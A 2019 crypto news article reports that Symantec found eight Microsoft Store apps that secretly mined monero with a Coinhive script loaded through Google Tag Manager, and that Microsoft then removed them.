bitcoin Bitcoin
ethereum Ethereum
polkadot Polkadot
ripple XRP
Show details
Microsoft Bag Filled with Pick Axes

Microsoft Finds and Boots Eight Cryptojacking Apps on Microsoft Store

Reading Time: 2 minutes by on February 19, 2019 Altcoins, Crime, Mining, News
Follow by Email

Microsoft has booted eight malevolent apps from its official desktop and app store that have been secretly mining monero (XMR) from unsuspecting computers. Researchers from Symantec discovered the eight malicious apps and informed Microsoft who took the necessary steps.

Apps Worked in a Similar Fashion

According to the official report from the researchers, an unknown number of users could have downloaded malicious apps via the official Microsoft Store. The Symantec report explains that all the apps were designed to work in a similar fashion.

The apps have been designed to load a Google-based tag-management library into their source code which they would use to download and execute the malicious payload. The offending apps were named Fast-search Lite, Battery Optimizer (Tutorials), VPN Browser+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019 and Findoo Mobile and Desktop Search.

Symantec’s Yuanjing Guo and Tommy Dong explained:

“In total, we discovered eight apps from these developers that shared the same risky behavior […] after further investigation; we believe that all these apps were likely developed by the same person or group.”

Activate Google Tag Manager (GTM)

The research team told ZDNet that they discovered the offensive apps on January 17, 2019, and went on to inform Microsoft who have since removed them from the Microsoft Store. The researchers believe the apps were created between April and December 2018 but most were most likely published towards the end of the year.

The researchers explained that once a victim downloaded and launched any of the malicious Apps, the App procured a coin-mining JavaScript library. The attackers managed to do this by activating the Google Tag Manager (GTM), the tagging system created by Google for the management of HTML and JavaScript tags that are used for tracking and managing analytics on websites and domain servers.

JavaScript Darling of Hackers

The mining script, made by Coinhive, once activated, uses a considerable amount of the users’ computer’s CPU cycles to mine the privacy-centric cryptocurrency monero.

According to the researchers, the app doesn’t mention coin mining on its policy or privacy description. The Coinhive JavaScript miner has been the darling of hackers, who love to stealthily embed the code into apps or websites to mine monero by tapping victims’ computer, tablets, and phones processing powers.  

The research team believes the apps, which use the same domain servers, were most likely developed by the same people using different names such as DigiDream, 1clean, and Findoo. Symantec has said that apart from Microsoft, they also contacted Google, who has also removed Google Tag Manager.

Cryptojacking malware targeting monero was a leading threat in crypto space in 2018 and has even targeted charity organizations like Make-A-Wish Foundation and The Los Angeles Times among others. Kaspersky Lab stated recently how a certain crypto mining attempt stole over $7 million in six months by infecting computers with mining malware.

Like BTCMANAGER? Send us a tip!
Our Bitcoin Address: 3AbQrAyRsdM5NX5BQh8qWYePEpGjCYLCy4
Join our telegram channel